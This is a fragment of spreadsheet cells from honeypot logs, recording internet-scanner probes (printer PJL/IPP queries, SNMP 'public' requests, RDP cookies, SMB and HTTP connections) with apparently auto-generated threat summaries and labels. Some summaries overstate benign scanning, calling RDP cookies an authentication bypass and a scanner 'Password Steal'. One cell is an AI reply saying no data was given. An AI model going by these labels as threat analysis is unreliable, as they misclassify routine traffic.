'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=45985'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,38608)}&amp;&amp;{Data_HTTP:{'Host': '38.60.224.106:80', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=60348'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,51504)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '38.54.116.162', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Host': '94.131.8.76:443', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '193.57.138.110:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://193.57.138.110:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '147', 'Content-Type': 'application/ipp', 'Host': '185.74.222.213:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://185.74.222.213:631/ipp|ATTR requested-attributes all'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=56586'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 103.211.202.140:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000D_
'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 194.4.48.242:9100_x000D_
_x000D_
'}}&amp;&amp;{Data_ORACLE:{'local_user': 'None', 'program': 'zgrab2', 'service_name': 'None'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=40403'}}&amp;&amp;{Data_IPP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Content-Length': '145', 'Content-Type': 'application/ipp', 'Host': '77.91.74.218:631', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'POST', 'uri': '/ipp'}}&amp;&amp;{Data_SMB:Incoming connection (162.142.125.213,58090)}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '77.91.74.218', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '194.4.48.242', 'User-Agent': 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'a84b4c76e66710', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'Censys &lt;sip:censysinspect@censys.io&gt;', 'max-forwards': '70', 'to': '&lt;sip:test.echo@sip5060.net&gt;', 'via': 'SIP/2.0/UDP 127.0.0.1:5060;received=162.142.125.213;rport=45975'}}&amp;&amp;{Data_IPP:{'request': 'VERSION 2.1|REQUEST 0x1|OPERATION Get-Printer-Attributes|GROUP operation-attributes-tag|ATTR attributes-charset utf-8|ATTR attributes-natural-language en-us|ATTR printer-uri ipp://77.91.74.218:631/ipp|ATTR requested-attributes all'}}</t>
  </si>
  <si>
    <t>::ffff:a28e:7dd5</t>
  </si>
  <si>
    <t>Low&amp;&amp;High&amp;&amp;Medium</t>
  </si>
  <si>
    <t>An attacker is attempting to bypass RDP authentication by setting a malicious cookie named MSTSHASH, which can potentially lead to unauthorized access. This may be an attempt to exploit a weakness in the server's authentication mechanism. The attacker is manipulating the session hash. &amp;&amp; This data suggests an attacker is attempting to exploit a vulnerability in network printing services, likely scanning for vulnerable printers on the network and probing them with malicious traffic, possibly as part of a larger attack campaign. The data indicates a remote connection attempt from a suspicious IP address to a printer service, which may be used for unauthorized access or data exfiltration. &amp;&amp; The data suggests a potential attack on an IPP service, where an unauthorized device is attempting to retrieve printer attributes from a server located at IP address 77.91.74.218. The request includes specific attribute settings and a unique printer URI. This could be indicative of reconnaissance or exploitation activity. &amp;&amp; Possible malicious activity involves a remote request to gather information about a printer, specifically its attributes and settings. The request includes details about the language and character set to be used in the communication. This could be part of a reconnaissance or probing attempt to identify vulnerabilities in a network. &amp;&amp; Possible malicious activity involves unknown or unverified sender attempting to send SMTP messages, potentially spamming or phishing victims. This could be part of a larger email-based attack campaign. It may indicate a compromised system sending unsolicited emails from an unknown source.</t>
  </si>
  <si>
    <t>Password Steal</t>
  </si>
  <si>
    <t>386ea08446ad50178bafd1e928c09f16</t>
  </si>
  <si>
    <t>198.235.24.163</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_POSTGRES_H47&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_FTP_H21&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_SIP_H16&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_IRC_H44&amp;&amp;SMA-LAB_RDP_H10&amp;&amp;SMA-LAB_IMAP_H22&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_POSTGRES_H26&amp;&amp;SMA-LAB_FTP_H13&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_IMAP_H44&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_RDP_H40&amp;&amp;SMA-LAB_RDP_H39&amp;&amp;SMA-LAB_REDIS_H30&amp;&amp;SMA-LAB_LDAP_H37&amp;&amp;SMA-LAB_POSTGRES_H44&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_SOCKS5_H19&amp;&amp;SMA-LAB_SOCKS5_H18&amp;&amp;SMA-LAB_SNMP_H29&amp;&amp;SMA-LAB_SNMP_H26&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_SIP_H29&amp;&amp;SMA-LAB_SNMP_H24&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_ORACLE_H15&amp;&amp;SMA-LAB_IMAP_H5&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H10&amp;&amp;SMA-LAB_FTP_H36&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_FTP_H29&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_PJL_H6&amp;&amp;SMA-LAB_ORACLE_H27&amp;&amp;SMA-LAB_ORACLE_H16&amp;&amp;SMA-LAB_LDAP_H41&amp;&amp;SMA-LAB_SNMP_H4&amp;&amp;SMA-LAB_LDAP_H24&amp;&amp;SMA-LAB_RDP_H45&amp;&amp;SMA-LAB_LDAP_H21&amp;&amp;SMA-LAB_SIP_H12&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_LDAP_H8&amp;&amp;SMA-LAB_POP3_H19&amp;&amp;SMA-LAB_FTP_H28&amp;&amp;SMA-LAB_MYSQL_H14&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SNMP_H32&amp;&amp;SMA-LAB_IMAP_H47&amp;&amp;SMA-LAB_SOCKS5_H24&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_RDP_H21&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_SNMP_H25&amp;&amp;SMA-LAB_ORACLE_H35&amp;&amp;SMA-LAB_MYSQL_H18&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_MYSQL_H3</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;5432&amp;&amp;389&amp;&amp;21&amp;&amp;53764&amp;&amp;23&amp;&amp;52748&amp;&amp;NA&amp;&amp;14419&amp;&amp;6667&amp;&amp;3389&amp;&amp;143&amp;&amp;51312&amp;&amp;1433&amp;&amp;6379&amp;&amp;1080&amp;&amp;161&amp;&amp;5900&amp;&amp;1521&amp;&amp;9100&amp;&amp;443&amp;&amp;55975&amp;&amp;52570&amp;&amp;445&amp;&amp;110&amp;&amp;3306&amp;&amp;55906&amp;&amp;80&amp;&amp;53307&amp;&amp;63152&amp;&amp;51641&amp;&amp;49973&amp;&amp;61690&amp;&amp;55966&amp;&amp;55212</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;request&amp;&amp;GET&amp;&amp;stshash&amp;&amp;query&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_HTTPS:{'Host': 'vmi1321974.contaboserver.net', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ovLybZSIM'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=qbKgaD'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,62310)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,62322)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,62324)}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,58628)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,61286)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,61298)}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'text/plain', 'call-id': '0817523826@10.132.0.163', 'contact': 'sip:YvVKooes@10.132.0.163:52105', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:oQwzxXVd@10.132.0.163:52105;tag=03419669', 'max-forwards': '20', 'to': 'sip:cNJWNDao@203.29.241.98', 'user-agent': 'CXrVnPfb', 'via': 'SIP/2.0/UDP 10.132.0.163:52105;branch=DNTNQW.2500735775;received=198.235.24.163;rport;alias'}}&amp;&amp;{Data_NTP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,63150)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,63160)}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,57798)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,64618)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,64634)}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=pFythnwqb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=LvuCWJ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=VXVriV'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=jSCZSoCUd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=vtSfCQ'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=nrrdpR'}}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,60086)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,60088)}&amp;&amp;{Data_SMB:Incoming connection (198.235.24.163,60100)}</t>
  </si>
  <si>
    <t>::ffff:c6eb:18a3</t>
  </si>
  <si>
    <t>No recent LDAP activity detected, which could indicate an evasion tactic to avoid detection. The absence of LDAP traffic may suggest an attacker is attempting to remain stealthy. This lack of activity does not necessarily imply malicious intent. &amp;&amp; Unauthorized access attempt via default SNMP community string, potentially leading to information disclosure or unauthorized configuration changes. The accessed OID likely represents the system's hostname or description. This indicates a potential security vulnerability if not properly configured.</t>
  </si>
  <si>
    <t>LDAP Attack &amp;&amp; SNMP Scan</t>
  </si>
  <si>
    <t>f56ba422d87de167d7e587a74271f34b</t>
  </si>
  <si>
    <t>117.216.155.220</t>
  </si>
  <si>
    <t>::ffff:75d8:9bdc</t>
  </si>
  <si>
    <t>c7295118d44f02e52d64183be83fac3a</t>
  </si>
  <si>
    <t>87.236.176.98</t>
  </si>
  <si>
    <t>euphoric.monitoring.internet-measurement.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Remote Fingerprinting Activity</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IMAP_H9&amp;&amp;SMA-LAB_IMAP_H28&amp;&amp;SMA-LAB_PJL_H32&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_ORACLE_H45&amp;&amp;SMA-LAB_REDIS_H32&amp;&amp;SMA-LAB_SMB_H39&amp;&amp;SMA-LAB_HTTPS_H46&amp;&amp;SMA-LAB_SNMP_H39&amp;&amp;SMA-LAB_PJL_H15&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_ORACLE_H5&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_PJL_H44&amp;&amp;SMA-LAB_REDIS_H16&amp;&amp;SMA-LAB_SMTP_H13&amp;&amp;SMA-LAB_SIP_H37&amp;&amp;SMA-LAB_POSTGRES_H30&amp;&amp;SMA-LAB_IMAP_H31&amp;&amp;SMA-LAB_PJL_H45&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_MYSQL_H35&amp;&amp;SMA-LAB_REDIS_H27&amp;&amp;SMA-LAB_REDIS_H35&amp;&amp;SMA-LAB_REDIS_H10&amp;&amp;SMA-LAB_POSTGRES_H6&amp;&amp;SMA-LAB_PJL_H46&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_ORACLE_H11&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_POP3_H24&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_REDIS_H40&amp;&amp;SMA-LAB_SOCKS5_H32&amp;&amp;SMA-LAB_REDIS_H15&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_IMAP_H36&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_LDAP_H17&amp;&amp;SMA-LAB_SOCKS5_H16</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;143&amp;&amp;9100&amp;&amp;1080&amp;&amp;1521&amp;&amp;6379&amp;&amp;445&amp;&amp;443&amp;&amp;161&amp;&amp;57658&amp;&amp;110&amp;&amp;NA&amp;&amp;5432&amp;&amp;23&amp;&amp;25&amp;&amp;3306&amp;&amp;389&amp;&amp;21&amp;&amp;6667&amp;&amp;80&amp;&amp;5900&amp;&amp;59893</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'ips.backscatterer.org': ['unknown']}</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;query&amp;&amp;GET&amp;&amp;request&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.98,46497)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.98,57441)}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.98,37081)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (87.236.176.98,40199)}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000D_
Host: 94.131.113.33:9100_x000D_
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000D_
Connection: close_x000D_
Accept: */*_x000D_
Accept-Encoding: gzip_x000D_
_x000D_
'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '66.94.127.183', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000D_
_x000D_
'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'lgqfgcan', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.98;tag=lgqfgcan', 'max-forwards': '0', 'to': 'sip:5.253.40.123', 'via': 'SIP/2.0/UDP 87.236.176.98:5060;branch=z9hG4bKlgqfgcan;received=87.236.176.98;rport=53136'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'onevxijk', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.98;tag=onevxijk', 'max-forwards': '0', 'to': 'sip:38.54.116.162', 'via': 'SIP/2.0/UDP 87.236.176.98:5060;branch=z9hG4bKonevxijk;received=87.236.176.98;rport=44191'}}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'weicscfc', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:87.236.176.98;tag=weicscfc', 'max-forwards': '0', 'to': 'sip:38.60.209.6', 'via': 'SIP/2.0/UDP 87.236.176.98:5060;branch=z9hG4bKweicscfc;received=87.236.176.98;rport=44387'}}</t>
  </si>
  <si>
    <t>::ffff:57ec:b062</t>
  </si>
  <si>
    <t>No log data provided.</t>
  </si>
  <si>
    <t>There is no log data provided. Please provide the actual log data, and I will be happy to analyze it for you.</t>
  </si>
  <si>
    <t>829c26dad00e8ac2ca51165357f313a2</t>
  </si>
  <si>
    <t>2.136.118.253</t>
  </si>
  <si>
    <t>253.red-2-136-118.staticip.rima-tde.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>HoneyPot BlackListed IP&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTPS_HC1</t>
  </si>
  <si>
    <t>80&amp;&amp;8443</t>
  </si>
  <si>
    <t>ES</t>
  </si>
  <si>
    <t>Spain</t>
  </si>
  <si>
    <t>CL</t>
  </si>
  <si>
    <t>Castille and León</t>
  </si>
  <si>
    <t>Segovia</t>
  </si>
  <si>
    <t>Martín Muñoz de la Dehesa</t>
  </si>
  <si>
    <t>3117337</t>
  </si>
  <si>
    <t>41.0665</t>
  </si>
  <si>
    <t>-4.68676</t>
  </si>
  <si>
    <t>3352</t>
  </si>
  <si>
    <t>TELEFONICA DE ESPANA S.A.U.</t>
  </si>
  <si>
    <t>RIMA (Red IP Multi Acceso)</t>
  </si>
  <si>
    <t>2010-11-05</t>
  </si>
  <si>
    <t>{Data_HTTP:{'Accept': 'text/plain,text/html', 'Host': '109.123.229.33', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:288:76fd</t>
  </si>
  <si>
    <t>Nmap Scan &amp;&amp; Port Scan</t>
  </si>
  <si>
    <t>7eb97460e81f88d7499f7eda566e95be</t>
  </si>
  <si>
    <t>185.247.137.89</t>
  </si>
  <si>
    <t>deliberate.monitoring.internet-measurement.com&amp;&amp;NA</t>
  </si>
  <si>
    <t>['attack-source'&amp;&amp; 'attack-target:mail'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected</t>
  </si>
  <si>
    <t>SMA-LAB_POP3_H28&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_MSSQL_H9&amp;&amp;SMA-LAB_REDIS_H14&amp;&amp;SMA-LAB_IRC_H12&amp;&amp;SMA-LAB_FTP_H44&amp;&amp;SMA-LAB_REDIS_H47&amp;&amp;SMA-LAB_REDIS_H21&amp;&amp;SMA-LAB_SMTP_H24&amp;&amp;SMA-LAB_REDIS_H7&amp;&amp;SMA-LAB_REDIS_H9&amp;&amp;SMA-LAB_REDIS_H23&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_SOCKS5_H2&amp;&amp;SMA-LAB_SOCKS5_H28&amp;&amp;SMA-LAB_REDIS_H6&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_REDIS_H18&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_POSTGRES_H11&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_PJL_H22&amp;&amp;SMA-LAB_SIP_H22&amp;&amp;SMA-LAB_POP3_H35&amp;&amp;SMA-LAB_POSTGRES_H36&amp;&amp;SMA-LAB_SOCKS5_H10&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_SOCKS5_H5&amp;&amp;SMA-LAB_POSTGRES_H9&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_SOCKS5_H8&amp;&amp;SMA-LAB_FTP_H31&amp;&amp;SMA-LAB_REDIS_H17&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_PJL_H24&amp;&amp;SMA-LAB_SOCKS5_H18</t>
  </si>
  <si>
    <t>110&amp;&amp;6379&amp;&amp;1433&amp;&amp;6667&amp;&amp;21&amp;&amp;25&amp;&amp;445&amp;&amp;5900&amp;&amp;1080&amp;&amp;46855&amp;&amp;5432&amp;&amp;9100&amp;&amp;NA&amp;&amp;1521&amp;&amp;143&amp;&amp;389&amp;&amp;23&amp;&amp;3389&amp;&amp;443</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'ips.backscatterer.org': ['unknown']}</t>
  </si>
  <si>
    <t>2018-03-01</t>
  </si>
  <si>
